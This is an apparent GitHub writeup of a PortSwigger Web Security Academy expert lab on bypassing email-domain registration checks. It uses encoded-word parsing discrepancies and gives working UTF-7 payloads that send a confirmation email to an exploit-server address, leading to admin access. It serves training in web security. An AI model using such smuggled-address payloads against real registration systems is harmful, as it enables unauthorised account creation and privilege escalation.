portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.

View on GitHub

Labs Covered

This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy:

12 Bypassing access controls using email address parsing discrepancies

This lab demonstrates how discrepancies in email address parsing between different components of an application can be exploited to bypass access controls.

LAB 12 - Bypassing access controls using email address parsing discrepancies

Lab Description :

image

Solution :

Identify the registration restriction:

Notice that the application blocks the request and displays an error message stating that the email domain must be ginandjuice.shop. This indicates the server enforces a domain check during registration

image

Investigate encoding discrepancies:

Try to register an account with the following email: ?iso-8859-1?q?=61=62=63?=foo@ginandjuice.shop This is the email abcfoo@ginandjuice.shop, with the abc portion encoded using Q encoding, which is part of the “encoded-word” standard.

image

Notice that the registration is blocked with the error: “Registration blocked for security reasons.”

image

Try to register an account with the following UTF-8 encoded email: =?utf-8?q?=61=62=63?=foo@ginandjuice.shop

image

Try to register an account with the following UTF-7 encoded email: =?utf-7?q?&AGEAYgBj-?=foo@ginandjuice.shop

image

Email register succesfully with UTF-7 encoding:

Notice that this attempt doesn’t trigger an error. This suggests that the server doesn’t recognize UTF-7 encoding as a security threat. Because UTF-7 encoding appears to bypass the server’s validation, you may be able to use it to craft an attack that tricks the server into sending a confirmation email to your exploit server email address while appearing to still satisfy the ginandjuice.shop domain requirement

image

Exploit the vulnerability using UTF-7:

Payload = ?utf-7?q?hanzala&AEA-exploit-0ac00054036ef89280a82557012f00a4.exploit-server.net&ACA-?=@ginandjuice.shop

Decoding the Components:

1. UTF-7 Encoding: ○ The AEA- and ACA- parts are used to encode special characters. In this case, they represent the characters @ and spaces. 2. Decoded Email: * ○ When you decode the entire string, you get: ` attacker@[YOUR-EXPLOIT-SERVER_ID]@ginandjuice.shop`

image

Click Email client. Notice that you have been sent a registration validation email. This isbecause the encoded email address has passed validation due to the @ginandjuice.shop portion at the end, but the email server has interpreted the registration email as attacker@[YOUR-EXPLOIT-SERVER-ID].

1 Click the confirmation link to activate the account.

image

Login after Registration successfully.

image

Gain admin access:

  1. Click My account and log in using the details you registered.
  2. Click Admin panel to access the list of users

image

Delete the carlos user to solve the lab.

image